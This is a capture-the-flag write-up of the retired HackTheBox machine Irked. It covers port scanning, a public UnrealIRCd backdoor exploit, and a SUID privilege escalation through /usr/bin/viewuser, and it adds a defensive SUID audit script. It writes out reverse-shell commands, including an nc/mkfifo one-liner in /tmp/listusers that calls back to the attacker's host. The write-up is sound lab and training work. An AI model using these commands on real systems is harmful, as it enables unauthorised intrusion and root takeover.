[HackTheBox] Irked Writeup

Posted on May 20, 2022

I worked through Irked, a retired HackTheBox machine, so here is my writeup.


Port Scan

kali@kali:~$ nmap -T4 -A -v -Pn -p- 10.10.10.117
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44470/udp6  status
|   100024  1          47934/tcp   status
|   100024  1          49257/udp   status
|_  100024  1          56691/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47934/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 6697

Use the nmap NSE scripts to check whether UnrealIRCd is vulnerable. The output shows that it is indeed the backdoored version.

kali@kali:~$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-18 00:58 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.25s latency).
Not shown: 341 closed ports
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds

Use this exploit to get a reverse shell.

kali@kali:~$ wget https://raw.githubusercontent.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/master/exploit.py
--2022-05-18 01:04:52--  https://raw.githubusercontent.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2195 (2.1K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                                  100%[==========================================================================================>]   2.14K  --.-KB/s    in 0s

2022-05-18 01:04:52 (19.2 MB/s) - ‘exploit.py’ saved [2195/2195]

Modify the local IP and port in the script to match the attacker's listener.

# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.5'  # CHANGE THIS
local_port = '4444'  # CHANGE THIS

Execute the script, then catch the connection with a netcat listener.

kali@kali:~$ python3 exploit.py -payload bash 10.10.10.117 6697
Exploit sent successfully!
kali@kali:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.117] 47434
bash: cannot set terminal process group (650): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Privilege Escalation ircd -> root

While enumerating for privilege escalation, I noticed an unfamiliar SUID file, /usr/bin/viewuser.

ircd@irked:~/Unreal3.2$ find / -type f -a \( -perm -u+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

If you run it, you'll see that the binary tries to execute /tmp/listusers, which does not exist yet.

ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)
djmardov pts/0        2022-05-20 03:12 (10.10.14.6)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed

Confirm that whatever is placed in /tmp/listusers runs with root privileges.

ircd@irked:~/Unreal3.2$ echo "id" > /tmp/listusers
echo "id" > /tmp/listusers

ircd@irked:~/Unreal3.2$ chmod +x  /tmp/listusers
chmod +x  /tmp/listusers

ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)
djmardov pts/0        2022-05-20 03:12 (10.10.14.6)
uid=0(root) gid=1001(ircd) groups=1001(ircd)
This application is being devleoped to set and test user permissions
It is still being actively developed
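As an added defensive check (not part of the box or the exploit), the script below flags SUID-root binaries that embed paths under world-writable directories, the pattern that makes /usr/bin/viewuser exploitable. Only the bytes passed to risky_paths in the test are constructed; run the script as root on a real host for a full scan.

```python
#!/usr/bin/env python3
"""Audit SUID-root binaries for hard-coded paths under world-writable
directories (/tmp, /var/tmp, /dev/shm). A privileged binary that runs
or reads a file from such a directory trusts whatever a local user
drops there, exactly the /usr/bin/viewuser -> /tmp/listusers bug."""
import os
import re
import stat
import sys

# Paths under directories that any local user can write to.
PATH_RE = re.compile(rb"/(?:tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+")


def is_suid_root(path: str) -> bool:
    """True for a regular file owned by root with the setuid bit set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return (stat.S_ISREG(st.st_mode)
            and bool(st.st_mode & stat.S_ISUID)
            and st.st_uid == 0)


def risky_paths(data: bytes) -> list:
    """Return the world-writable paths embedded in a binary's bytes."""
    found = {m.group(0).decode(errors="replace") for m in PATH_RE.finditer(data)}
    return sorted(found)


def audit(root: str = "/") -> dict:
    """Map each SUID-root file under root to the risky paths it embeds."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []  # skip pseudo-filesystems
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not is_suid_root(full):
                continue
            try:
                with open(full, "rb") as f:
                    hits = risky_paths(f.read())
            except OSError:
                continue
            if hits:
                results[full] = hits
    return results


if __name__ == "__main__":
    for binary, paths in audit(sys.argv[1] if len(sys.argv) > 1 else "/").items():
        print(f"{binary}: references {', '.join(paths)}")
```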

Write a reverse shell into /tmp/listusers and run viewuser again to get a shell with root privileges.

ircd@irked:~/Unreal3.2$ echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 4242 >/tmp/f' > /tmp/listusers
ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)

Get the user flag and the root flag.

kali@kali:~$ nc -nlvp 4242
listening on [any] 4242 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.117] 53024
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# cat /home/djmardov/Documents/user.txt
*************************
# cat /root/root.txt
*************************

Thoughts

It took me a while to notice the existence of /usr/bin/viewuser, but it was a simple and wonderful machine.